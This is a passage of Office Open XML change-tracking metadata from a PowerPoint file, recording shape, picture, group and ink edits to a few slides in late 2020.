          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T20:51:15.832" v="943" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3350321975" sldId="362"/>
            <ac:spMk id="5" creationId="{CAC7B1B5-C687-4002-980E-E7CA70177826}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T20:52:48.017" v="946" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3350321975" sldId="362"/>
            <ac:spMk id="6" creationId="{BD6BD763-C797-4126-B46C-F9CDEFC0E07E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T20:52:59.830" v="950" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3350321975" sldId="362"/>
            <ac:spMk id="7" creationId="{7FB6322F-559B-40B4-83FA-9612BCABF0E8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T20:51:09.416" v="942" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3350321975" sldId="362"/>
            <ac:picMk id="3" creationId="{FC09DABF-17EA-483C-9842-E3ECAE17FF4D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T20:51:15.832" v="943" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3350321975" sldId="362"/>
            <ac:picMk id="4" creationId="{9AE695E7-E151-4FD1-9853-27794BBB6691}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp new add del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-23T15:31:29.938" v="11265" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="898023219" sldId="363"/>
        </pc:sldMkLst>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-28T18:08:45.146" v="3933"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="898023219" sldId="363"/>
            <ac:picMk id="2" creationId="{0A32D436-33B4-4EDC-B8BB-C8BA32E90B56}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T20:54:38.022" v="959" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="929311994" sldId="363"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-23T20:54:33.633" v="957" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="929311994" sldId="363"/>
            <ac:spMk id="2" creationId="{973B83D7-2291-4BD7-8F73-3397A18C1F99}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T21:04:51.701" v="6197"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="135317018" sldId="364"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T08:44:02.895" v="1373" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:spMk id="86" creationId="{57607C94-DAD3-468A-8795-4292A0891A71}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:05:57.790" v="1448" actId="34122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:spMk id="126" creationId="{CBBEF171-0FB0-4CC8-A828-4B93421BF2F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:16:20.348" v="1765" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:spMk id="198" creationId="{3E0902F4-1D4A-4096-9171-DCEE0118B644}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:06:05.016" v="1449" actId="164"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="9" creationId="{BEE92B1E-2517-47E2-8FE9-E9352DD11226}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:29.487" v="5911" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="47" creationId="{B416A85D-D327-47E0-AC40-FD24F84389FF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:13:46.541" v="1632" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="50" creationId="{66353431-2C8E-4E17-98A8-F575B0C81D98}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del 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54" creationId="{925AF180-A28A-4CFE-B705-12B3405CEEDE}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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60" creationId="{5FD42984-1DF0-482E-9162-40CA94F24DAF}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del 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75" creationId="{CCCBDD68-2080-4F3C-867C-C15D9882340B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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80" creationId="{65A274CF-0889-45A6-A6F2-24FEFFF42AC3}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:14:27.338" v="1656"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="88" creationId="{12D51A9A-E0FE-4800-AF2A-59DBE1DE3C3F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:12:52.845" v="1624"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="100" creationId="{3D4CE603-A673-497E-9A02-7232103B4CE8}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del 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27" creationId="{99E7B15E-4B4D-446B-9EBA-EC2CAF69EF84}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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30" creationId="{286C256F-FB33-4FF8-9BE2-19B7E4B2A50C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:48.799" v="5933" actId="1038"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="133" creationId="{C680B792-8BD2-4360-8C7D-93BE15F8D760}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:06.383" v="1685"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="139" creationId="{B67F8D48-72A5-4285-8B26-3E8629C0A712}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:09.436" v="1692"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="141" creationId="{76F6252E-E601-45B0-A607-E469AAE30D3F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:12.227" v="1697"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="148" creationId="{6370CAC0-DB38-476C-B3B0-8EDF0E28F7E3}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:48.799" v="5933" actId="1038"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="153" creationId="{1608AB3B-BCAC-49DC-B631-2DAC30B9883B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:25.083" v="1701"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="157" creationId="{3F0BA190-5CFD-46F3-A381-95328ACE65ED}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:35.473" v="1718"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="160" creationId="{E616DC26-186D-45AE-ADA7-44743A7DEC37}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:34.293" v="1712"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="166" creationId="{5F3E4602-EE53-4FE5-B675-0BE0C4D19D97}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:42.475" v="1725"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="169" creationId="{FEF47BBF-931D-4F03-92E6-67DB2950B1E3}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:45.147" v="1731"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="172" creationId="{7C7BF379-F4CA-4A06-8635-B3E6F915F0C0}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add 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72" creationId="{EFE39E35-A73F-4B9F-9AAF-8620867E9C3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78" creationId="{C055820A-B62B-463A-9736-BA3E9429064F}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:52.777" v="1743"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="178" creationId="{D12E45EF-192E-438D-9ED3-D0ECEDF0867D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90" creationId="{942FA946-1C71-4797-B59F-7CA07EC68563}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del 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0" creationId="{95A09E93-D0A5-4917-837F-CC3B68F0BF4B}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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6" creationId="{FC1F305B-981E-4EC0-A5B8-E17E173C81B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1" creationId="{BF6259EB-E869-4E16-A182-C25D7A51A004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2" creationId="{E44C7471-7BC6-42A8-B977-9B42C694AE11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5" creationId="{F11305C7-AAC3-4622-8602-478F36625157}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:41.764" v="5915" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:grpSpMk id="224" creationId="{B9A5439F-3754-447E-99F3-B0062A7FD85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28" creationId="{2D0D822E-9A82-4EB6-98C3-D9742896E8B4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:25.984" v="5910" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:picMk id="2" creationId="{93DF79E5-61EA-491A-8B74-8DDBA33A6421}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:16:16.540" v="1764" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:picMk id="21" creationId="{A3263631-C31C-44D6-AC72-F858E18EC3A1}"/>
          </ac:picMkLst>
        </pc:pic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3" creationId="{47B28F51-5841-4255-AAF4-0A6DE6746846}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del 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4" creationId="{ED4F84B1-699E-45D3-93BC-AB8D8B7403B7}"/>
          </ac:inkMkLst>
        </pc:ink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5" creationId="{2FA01590-63B2-4909-8100-AA87A3A4A7BA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8" creationId="{41ED303C-B50E-4770-82F1-7C69D01A031F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9" creationId="{06D9FDB5-AE1C-40FA-95D6-7524226AAB65}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-11-15T20:51:48.799" v="5933" actId="1038"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="51" creationId="{DB56F79F-5F4A-4DB4-A8F4-5CAC30154DFC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2" creationId="{BB64F29C-5F88-487E-9CA2-949F087D30B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3" creationId="{60DD9D7F-8B17-4778-B26D-3DF76EFA67E0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5" creationId="{1D15EAE0-765A-4A78-BAE1-A7D162C529BF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6" creationId="{5E4DBDA7-9033-4607-871B-9507C23EF41D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7" creationId="{BE7FBDEF-6D50-4B2C-A17C-467AF58D025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8" creationId="{4898221B-D0D5-48C5-9A0D-8E40CA910A3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1" creationId="{01598933-2F45-44F6-B6B4-1CCAFB4DBCFF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2" creationId="{3F41CA87-C7F1-44D3-AA93-98E425BF19B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3" creationId="{A10A63DA-9D41-45B5-95D7-FFED72E0735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4" creationId="{84B86A3B-4C4F-42C9-924D-3B91710B62E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5" creationId="{7D318A45-BC41-4CBA-8177-4C3188B162C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6" creationId="{E821DBE4-B0B8-43C4-9E7C-3D70C4A5BEEE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:14:29.177" v="1661" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="67" creationId="{B584A49F-77C2-4662-8923-5EEEC82A1BAF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:14:28.569" v="1660"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="70" creationId="{505AAD44-60F3-4B19-9921-DAB22A0F3487}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:14:28.328" v="1658" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="81" creationId="{4E3C5572-2B2F-4D75-87FB-A1C22A06AC08}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:14:27.910" v="1657" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="85" creationId="{9F868B3B-7EBB-4480-82B4-CA4FAE7FDC73}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:14:27.338" v="1656"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="87" creationId="{3DA4F432-8039-4A85-B6A1-9784642E9D26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3" creationId="{481EF7BC-56AB-49DF-9168-99541C5C782A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5" creationId="{C6DF9B6C-AF88-4117-BE7C-BE3E509C342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2" creationId="{5A21A807-5845-4BF2-B3ED-DFEAD5C580C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5" creationId="{6C0E890B-A878-4A89-BD0D-239D84F81C12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6" creationId="{83AEA8A9-2E75-406C-8DF0-BE3C11968AF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8" creationId="{450A7ABC-7DC1-4FC0-BBDD-91714469EE4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9" creationId="{0944C4D0-26A4-4022-9ECC-4D97E7B6530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2" creationId="{5FA0954B-1273-4E7B-B323-0B1DDB9CC76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3" creationId="{A0F15A1A-EB35-495C-87FD-A762469539B1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4" creationId="{E32B135A-D4E6-469D-802D-BF3C7B12F3FA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5" creationId="{224799D9-D01B-4859-A968-321DAEE88E8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8" creationId="{5410EA62-1B58-4891-9D8B-DCD8840595A4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9" creationId="{F5FD7754-F517-45BD-B4AA-464708E264EB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1" creationId="{8F6E924A-1790-4377-842D-631D72B3E1D0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2" creationId="{624B4FC6-8A1B-4A81-93AC-D860D6686B94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4" creationId="{D62FAF4E-6A3B-4C5B-AFD3-A7FAAD1EAA33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5" creationId="{CE8D1DE2-2E0A-4397-AFE8-BD7D3862392A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6" creationId="{9409F6C6-FEAE-4A6A-A439-3D3EE507F0D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7" creationId="{9DCA1DB2-5202-4A4F-A405-549276F6DC3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8" creationId="{4C2AC053-2943-4F58-B78B-AE989DD8548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0" creationId="{780F7A66-8803-4CD7-B26B-31F99552198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2" creationId="{8EEC4576-147B-4223-96F9-4CB4EEF4234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3" creationId="{08207BC9-F8D4-4A1E-8D7D-C1716367A671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4" creationId="{1BA779DC-9A46-40F5-8E4D-1C99F487322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5" creationId="{53059599-EAF6-4744-BF3E-18B6E6898EC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6" creationId="{749C88E7-C66E-48A5-90B1-425C26737A7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7" creationId="{0C6B4231-BE2A-40F2-B611-A6BA029E2F2F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9" creationId="{C8961D64-6F35-4DDF-A09C-C6677E4D6DE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0" creationId="{17757810-B29B-455D-B410-0BF2FCDB0F89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1" creationId="{95F6241A-E972-4262-86D8-F0C1BF40511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2" creationId="{BDA0CDED-A918-4A7F-B927-6DBCDEA5EE41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4" creationId="{6BB43EC7-031E-4272-87AE-47F3E896A797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5" creationId="{ECA4AFF5-4A6D-457C-A614-D3A257BFEF70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6" creationId="{FA0C55F7-83FE-4029-A8E3-DBB4A18CD375}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:35.776" v="1719" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="158" creationId="{01E9E64B-A4B3-4C00-8391-4E5CB631D727}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:35.473" v="1718"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="159" creationId="{BAEDF0F0-91CB-49BE-8AC9-46F654585FF4}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:35.190" v="1716" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="161" creationId="{01190D09-901C-4F52-88C7-E28E97B18E9A}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:35.017" v="1715" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="162" creationId="{28EE49CF-92CE-4AEC-A678-3B36F1ADAF3B}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:34.816" v="1714" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="163" creationId="{2681130A-050F-47A5-9364-7045A8F3EAED}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:34.566" v="1713" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="164" creationId="{CCAC1295-3022-4636-99EC-FF0819175957}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{0C9D1E1A-4752-47A2-BB2B-FBDA551F9E93}" dt="2020-10-24T09:15:34.293" v="1712"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="135317018" sldId="364"/>
            <ac:inkMk id="165" creationId="{A1E29BAE-E26E-4D1A-8D0F-96D36B1D5C4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7" creationId="{FA45E72D-5E67-4C91-A73A-E6CA3CC426F0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8" creationId="{10ECF6C1-6978-4065-A10C-0CAFD8EEC61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0" creationId="{F53BF492-2057-4E26-B342-F170D3D3771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1" creationId="{46B0F426-AFB4-47E5-8008-E98F8E8A02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3" creationId="{A60F3E6B-6604-47E2-9B06-E662AA05C7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4" creationId="{3C598CA4-B450-4291-BEB6-20E05A3E0B1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5" creationId="{68595295-C596-48F8-8F15-1193D02307D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6" creationId="{935DCADF-D494-4F2C-88E1-44DCA73AB0A1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7" creationId="{47CF2D7F-8189-4097-A306-60529FF9339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9" creationId="{797FCC47-3845-4EE8-98BD-9D1313C60B3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0" creationId="{C1738823-F550-4F75-8BA9-467E77F0A3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1" creationId="{03B4EC8F-FBB8-40AA-8CBC-99EEBC164B2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2" creationId="{63D94BD3-3036-4744-AEA6-43DCF04B91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3" creationId="{BB408BAD-2879-4545-87F9-7755BFCF6D7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4" 